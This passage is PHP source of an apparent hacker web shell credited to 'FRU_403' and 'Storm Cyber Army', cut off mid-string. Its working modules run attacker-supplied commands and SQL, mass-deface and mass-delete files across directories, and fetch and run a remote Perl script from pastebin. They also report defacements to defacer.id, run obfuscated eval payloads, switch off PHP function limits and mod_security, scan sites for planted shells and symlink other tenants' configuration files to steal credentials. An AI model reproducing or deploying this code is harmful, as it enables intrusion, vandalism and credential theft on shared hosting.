678if($i == $_GET['z']) $head .= "<option value='".$i."' selected='selected'>".$i."</option>";} $head .= "</select><noscript><input class='inputzbut' type='submit' value='Go !' /></noscript></form></div>";$msg = $msgq.$head.$msg;}
679elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){$db = $_GET['db'];$query = magicboom($_GET['sqlquery']);
680$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";@mysql_select_db($db);$querys = explode(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query);
681if($hasil){$msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";$msg .= "<table class='explore' style='width:99%;'><tr>";
682for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";$msg .= "</tr>";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "<tr>";for($j=0;$j<@mysql_num_fields($hasil);$j++) {
683if($rows[$j] == "") $dataz = " ";
684else $dataz = $rows[$j];$msg .= "<td>".$dataz."</td>";} $msg .= "</tr>";} $msg .= "</table>";}
685else $msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> error <span class='gaya'>]</span></p>";} } }
686else {$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /><input type='hidden' name='x' value='mysql' /><input type='hidden' name='sqlhost' value='".$sqlhost."' /><input type='hidden' name='sqluser' value='".$sqluser."' /><input type='hidden' name='sqlport' value='".$sqlport."' /><input type='hidden' name='sqlpass' value='".$sqlpass."' /><input type='hidden' name='db' value='".$db."' /><p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p><p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p></form></div> ";$dbs = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available databases</th></tr>";$hasil = @mysql_list_dbs($con);
687while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);foreach($dbs as $db){
688$msg .= "<tr><td><a href='?bom&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."'>$db</a></td></tr>";} $msg .= "</table>";}
689@mysql_close($con);} else $msg = "<p style='text-align:center;'>can't connect</p>";echo $msg;} else{?>
690<br><center><h2 class="cgx2">MySQL Connect</h2><form action="?" method="get"><input type="hidden" name="y" value="<?php echo $dir;?>" /> <input type="hidden" name="x" value="mysql" /><table class="tabnet" style="width:300px;" align="center"> <tr><th colspan="2">Connection Form</th></tr> <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr></table></form></center>
691<?php }}
692 elseif($_GET['do'] == 'cmd') {?>
693<form action="?bom&act=<?php echo $dir;?>&do=cmd" method="post"> <table class="cmdbox"> <tr><td colspan="2">
694<textarea class="output" readonly>
695<?php if(isset($_POST['submitcmd'])) {echo @exe($_POST['cmd']);} ?>
696</textarea> <tr><td colspan="2"><?php echo "$user >";?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Do !" name="submitcmd" style="width:12%;" /></td></tr> </table></form>
697<?php } elseif($_GET['do'] == 'mass_deface') {
698 function sabun_massal($dir,$namafile,$isi_script) {
699 if(is_writable($dir)) {
700 $dira = scandir($dir);
701 foreach($dira as $dirb) {
702 $dirc = "$dir/$dirb";
703 $lokasi = $dirc.'/'.$namafile;
704 if($dirb === '.') {
705 file_put_contents($lokasi, $isi_script);
706 } elseif($dirb === '..') {
707 file_put_contents($lokasi, $isi_script);
708 } else {
709 if(is_dir($dirc)) {
710 if(is_writable($dirc)) {
711 echo "[<font color=lime>DONE</font>] $lokasi<br>";
712 file_put_contents($lokasi, $isi_script);
713 $idx = sabun_massal($dirc,$namafile,$isi_script);
714 }
715 }
716 }
717 }
718 }
719 }
720 function sabun_biasa($dir,$namafile,$isi_script) {
721 if(is_writable($dir)) {
722 $dira = scandir($dir);
723 foreach($dira as $dirb) {
724 $dirc = "$dir/$dirb";
725 $lokasi = $dirc.'/'.$namafile;
726 if($dirb === '.') {
727 file_put_contents($lokasi, $isi_script);
728 } elseif($dirb === '..') {
729 file_put_contents($lokasi, $isi_script);
730 } else {
731 if(is_dir($dirc)) {
732 if(is_writable($dirc)) {
733 echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
734 file_put_contents($lokasi, $isi_script);
735 }
736 }
737 }
738 }
739 }
740 }
741 if($_POST['start']) {
742 if($_POST['tipe_sabun'] == 'mahal') {
743 echo "<div style='margin: 5px auto; padding: 5px'>";
744 sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
745 echo "</div>";
746 } elseif($_POST['tipe_sabun'] == 'murah') {
747 echo "<div style='margin: 5px auto; padding: 5px'>";
748 sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
749 echo "</div>";
750 }
751 } else {
752 echo "<center>";
753 echo "<form method='post'>
754 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
755 <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
756 <font style='text-decoration: underline;'>Folder:</font><br>
757 <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
758 <font style='text-decoration: underline;'>Filename:</font><br>
759 <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
760 <font style='text-decoration: underline;'>Index File:</font><br>
761 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by FRU_403</textarea><br>
762 <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
763 </form></center>";
764 }
765} elseif($_GET['do'] == 'mass_helper'){
766 echo "<center>";
767echo "<span style=\"color:lime; font: 14px Comic Sans MS; font-weight:bold;\">Help :<br>1. After u get root, Upload ur deface source as index.txt <br>2. Run this comand on ur CMD / Terminal : <br></span><br/>";
768echo "<help> <blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep DocumentRoot>dir.txt </b></help><br/>";
769echo "<help> <blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep ServerName>dmn.txt </b></help><br><br/><br/>";
770echo "<form method=POST>
771<help title='the file you want to put in all sites'> Def page name : </help>
772 <input title='the file name you want to put in all sites' type=text name=index value=bie.htm> |
773<help title='your deface page's source code'>Def source code :</help>
774 <input title='your index source code' type='text' name='source' value='index.txt'><br><br>
775<help>List DocumentRoot from httpd.conf : </help><br>
776<input type=text name=dirs size=\"40\">
777<br><br>
778<help>List ServerName from httpd.conf : </help><br>
779<input type=text name=sites size=\"40\">
780<br><br>
781<center><input class='but' type=submit value='Generate ' name='go'></center>
782</form>
783<br/>";
784echo "</center>";
785if($_POST['go']){
786echo "<b></b>";
787$index = $_POST['index'];
788$source = $_POST['source'];
789$dirs =explode("\n",@dd1(file_get_contents($_POST['dirs'])));
790$sites =explode("\n",@dd2(file_get_contents($_POST['sites'])));
791
792// preparing perl script
793
794if($_POST['dirs']){
795
796
797 $perl = fopen ('mass.txt','w+') or die (" WTF !! , i cannot create files o__O");
798 $perl_start = "#!/usr/bin/perl";
799 $perl_end = "print\"All Defaced !\";";
800 fwrite ($perl,$perl_start."\n\n"); // Write !!
801
802foreach($dirs as $dir){
803
804$result = "system(\"cat ".$source." > ".@kill($dir)."/".$index."\");";
805fwrite ($perl, $result."\n");
806flush();
807}
808 echo "<tr><td><font style='font: 9pt Comic Sans MS; COLOR: #FFFFFF;font-weight:bold;'>perl script <a style='text-decoration: none;color:lime;' href='mass.txt'>mass.txt</a></font></td><td><br>";
809 echo "<help>Now run this mass.txt on ur CMD / Terminal <blink>=> </blink> perl mass.txt </help><br>";
810 fwrite ($perl, "\n".$perl_end);
811 fclose($perl);
812
813 }
814 // preparing sites list
815
816if($_POST['sites']){
817
818
819 $sitess = fopen ('sites.txt','w+') or die ("WTF !! , i can't create files o__O");
820 $sitess_start = "http://";
821 $sitess_end = "/";
822 fwrite ($sitess,"");
823
824foreach($sites as $site){
825
826 $result2 = $sitess_start.@kill($site).$sitess_end.$index;
827 fwrite ($sitess, $result2."\n");
828 flush();
829}
830 echo "<br /><tr><td><help>Defaced sites : <a style='text-decoration: none;color:lime;' href='sites.txt'>sites.txt</a></help></td><td><br/><br/>";
831 fwrite ($sitess,"");
832 fclose($sitess);
833
834}
835 }
836function kill($value){ return str_replace(array("\n","\r"),"",$value); }
837function dd1($value){ return str_replace(array("DocumentRoot"," "),"",$value); }
838function dd2($value){ return str_replace(array("ServerName"," "),"",$value); }
839echo "<br />";
840echo "<div class='greetz'><center> Original script by <b>ReZK2LL</center><font></div>";
841
842}elseif($_GET['do'] == 'lcf') {
843 mkdir('priv_lcf',0755);
844chdir('priv_lcf');
845$kokdosya = ".htaccess";
846$dosya_adi = "$kokdosya";
847$dosya = fopen ($dosya_adi , 'w') or die ("Error mas broo!!!");
848$metin = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .pl \n AddHandler cgi-script .pl \n AddHandler cgi-script .pl
849\n \n Options \n DirectoryIndex seees.html \n RemoveHandler .php \n AddType application/octet-stream .php";
850fwrite ( $dosya , $metin ) ;
851 fclose ($dosya);
852$file = fopen("lcf.pl","w+");
853$write = fwrite ($file ,file_get_contents("http://pastebin.com/raw/26jAL0sz"));
854fclose($file);
855chmod("lcf.pl",0755);
856echo "<iframe src=LCF/lcf.pl width=97% height=100% frameborder=0></iframe>";
857}elseif($_GET['do'] == 'defacerid') {
858echo "<center><form method='post'>
859 <u>Defacer</u>: <br>
860 <input type='text' name='hekel' size='50' value'FRU_403'><br>
861 <u>Team</u>: <br>
862 <input type='text' name='tim' size='50' value='Storm Cyber Army'><br>
863 <u>Domains</u>: <br>
864 <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
865 <input type='submit' name='go' value='Submit' style='width: 450px;'>
866 </form>";
867$site = explode("\r\n", $_POST['sites']);
868$go = $_POST['go'];
869$hekel = $_POST['hekel'];
870$tim = $_POST['tim'];
871if($go) {
872foreach($site as $sites) {
873$zh = $sites;
874$form_url = "https://www.defacer.id/notify";
875$data_to_post = array();
876$data_to_post['attacker'] = "$hekel";
877$data_to_post['team'] = "$tim";
878$data_to_post['poc'] = 'SQL Injection';
879$data_to_post['url'] = "$zh";
880$curl = curl_init();
881curl_setopt($curl,CURLOPT_URL, $form_url);
882curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
883curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
884curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
885curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
886curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
887$result = curl_exec($curl);
888echo $result;
889curl_close($curl);
890echo "<br>";
891}
892}
893}elseif($_GET['do'] == 'sc') {
894 eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH2v1P9gLKQGKXjLJh4GesRA7bSXVmd1Dysosi3bASo3uakznIn/vut8kcJr2AtEq9jOOfeeeB9fVS0nZ5YC0yCj4WCWZkwSc1eY39Bclil02nHZDSUm1QV0uIrjErTlGY4FSvqGbZ6GB3okGCKcVsFll4FRgNVNnEEmhUiGlTYbYh3fKcH1OOXlUUxjYSyswJBaylE6nKTcqfnx8QmR/B4H03U2duNUs62s/wUTiSapM1chRCXbrXPI1RsB9bws9Gbgcju/My7xC9fII5fcbj4M78uO6NljkCesKpTsQMdefSwBBTMFZMozCA61BRRsUf4MBwSfUAsGWEhxXjPqTAc7eENXG51rEOpFTQYtej29DcnnkHzqkAJOwlXMh/xKZCxhOALgTjivc2c6CpGyHvn10e0ezBeO0HeMdppCUkGCQc2cfJxBu0Uq5l2hCs2lJ8bL1eLbd7Gmi9Wvi6+r+PvV1W9W20AV+mqSJQ6xtDrKRtLIJbQP2vJ58xrTh2tEB0MKvekK3kbln/PSFC6gwjiV5OYRjs9qfsUbiYaNkrBBadQL/dQTZS8LDcnCC2GFjgkdDvbU5hY/51wAC6g1CjPoB40ZqKH9uGwVLEBr+Bw4JGu2DpndykSfA/VyUAx0uwivGtPe6lzOryUAi37whHLei1mjJRsY+UBzhksJOZqWouCeZ2JqI9Fq82vrDHuMXnyfWqr7TyZEW+ITAafghQlBXpjgep2YJXqyNGfM4vnkp2IgzDiyBGwHkqykURcdvFQ1e/797zNJphTGvschWMiiL1yT9zjm4QB//pgLpUAHh/HlxfLrbUdqTnkUvf6F7U71TYrfK6y2IWCGrq00hKqBbYaR0nmCtmnsoGBFi8aqIxpIx95mSXK8qocdYFCgry/5G12XSST6j4vdvJpdrzah3fslOEOm6LbYYs7TXw=='))))));
895}elseif($_GET['do'] == 'lh'){
896 eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));
897}elseif($_GET['do'] == 'sf') {
898 echo'<center><h2>Shell Finder</h2>
899<form action="" method="post">
900<input type="text" size="50" name="traget" value="http://www.site.com/"/>
901<br>
902<input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
903</form><br>';
904if (isset($_POST["scan"])) {
905$url = $_POST['traget'];
906echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
907echo "Result :<br />";
908$shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
909"x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
910"Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
911"vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
912"d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
913"wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
914"wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
915"tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
916"tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
917"whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
918"templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
919"admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
920"/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
921"/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
922"/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
923"/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
924"/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
925"wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
926"tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
927"tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
928"forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
929"spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
930"Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
931"tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
932"/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
933foreach ($shells as $shell){
934$headers = get_headers("$url$shell"); //
935if (eregi('200', $headers[0])) {
936echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Selesai Ndan</span><br /><br/><br/>"; //
937$dz = fopen('result.txt', 'a+');
938$suck = "$url$shell";
939fwrite($dz, $suck."\n");
940}
941}
942echo "Shell [ <a href='./result.txt' target='_blank'>result.txt</a> ]</span>";
943}
944}elseif($_GET['do'] == 'mass_delete') {
945 function hapus_massal($dir,$namafile) {
946 if(is_writable($dir)) {
947 $dira = scandir($dir);
948 foreach($dira as $dirb) {
949 $dirc = "$dir/$dirb";
950 $lokasi = $dirc.'/'.$namafile;
951 if($dirb === '.') {
952 if(file_exists("$dir/$namafile")) {
953 unlink("$dir/$namafile");
954 }
955 } elseif($dirb === '..') {
956 if(file_exists("".dirname($dir)."/$namafile")) {
957 unlink("".dirname($dir)."/$namafile");
958 }
959 } else {
960 if(is_dir($dirc)) {
961 if(is_writable($dirc)) {
962 if(file_exists($lokasi)) {
963 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
964 unlink($lokasi);
965 $idx = hapus_massal($dirc,$namafile);
966 }
967 }
968 }
969 }
970 }
971 }
972 }
973 if($_POST['start']) {
974 echo "<div style='margin: 5px auto; padding: 5px'>";
975 hapus_massal($_POST['d_dir'], $_POST['d_file']);
976 echo "</div>";
977 } else {
978 echo "<center>";
979 echo "<form method='post'>
980 <font style='text-decoration: underline;'>Folder:</font><br>
981 <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
982 <font style='text-decoration: underline;'>Filename:</font><br>
983 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
984 <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
985 </form></center>";
986 }
987}elseif($_GET['do'] == 'bypass'){
988 echo "<center>";
989 echo "<form method=post><input type=submit name=ini value='php.ini' /> <input type=submit name=htce value='.htaccess' /></form>";
990 if(isset($_POST['ini']))
991{
992 $file = fopen("php.ini","w");
993 echo fwrite($file,"disable_functions=none
994safe_mode = Off
995 ");
996 fclose($file);
997 echo "<a href='php.ini'>click here!</a>";
998} if(isset($_POST['htce']))
999{
1000 $file = fopen(".htaccess","w");
1001 echo fwrite($file,"<IfModule mod_security.c>
1002SecFilterEngine Off
1003SecFilterScanPOST Off
1004</IfModule>
1005 ");
1006 fclose($file);
1007 echo "htaccess successfully created!";
1008}
1009 echo"</center>";
1010} elseif($_GET['do'] == 'convh')
1011 {
1012@mkdir('priv_vhost', 0755);
1013@chdir('priv_vhost');
1014 $elesem = ".htaccess";
1015 $elakab = "$elesem";
1016 $filhat = fopen ($elakab , 'w') or die ("Can't Write htaccess !");
1017 $htcont = "Options FollowSymLinks MultiViews Indexes ExecCGI
1018
1019AddType application/x-httpd-cgi .ler
1020
1021AddHandler cgi-script .ler
1022AddHandler cgi-script .ler";
1023 fwrite ( $filhat , $htcont ) ;
1024 fclose ($filhat);
1025$config = 'PHA+PGZvbnQgY29sb3I9ImdyZWVuIj5SZXN1bHQgMSA6IDxzdHJvbmc+IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluIHByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOyBwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+IDxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4gIDxoZWFkPiA8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4gPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+IDx0aXRsZT52SG9zdHMgQ29uZmlnIEdyYWJiZXI8L3RpdGxlPiA8c3R5bGUgdHlwZT0idGV4dC9jc3MiPiAubmV3U3R5bGUxIHsgIGZvbnQtZmFtaWx5OiB1YnVudHU7ICBmb250LXNpemU6IHgtbGFyZ2U7ICBjb2xvcjogd2hpdGU7ICBiYWNrZ3JvdW5kLWNvbG9yOiAjMTUxNTE1OyAgdGV4dC1hbGlnbjogY2VudGVyOyB9IDwvc3R5bGU+IDwvaGVhZD4gJzsgICBwcmludCAnIDxib2R5IGNsYXNzPSJuZXdTdHlsZTEiPiA8cD4uOiBDb2RlZCBieSBGYWxsYWcgR2Fzc3JpbmkgfCBSZWMwZGVkIGJ5IENvdXJhZ2V1eDwvcD4nOyBvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOyBmb3JlYWNoKHNvcnQgcmVhZGRpciAkZGlyKSB7ICAgICBteSAkaXNEaXIgPSAwOyAgICAgJGlzRGlyID0gMSBpZiAtZCAkXzsgJHNpdGVzcyA9ICRfOyAgIHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLW9zLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictb3Njb21tZXJjZS50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1vc2NvbW1lcmNlcy50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atc2hvcHBpbmcudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zYWxlLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIyLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLW1lbWJlcnMudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW0udHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bXMvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtcy50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmZpZy5w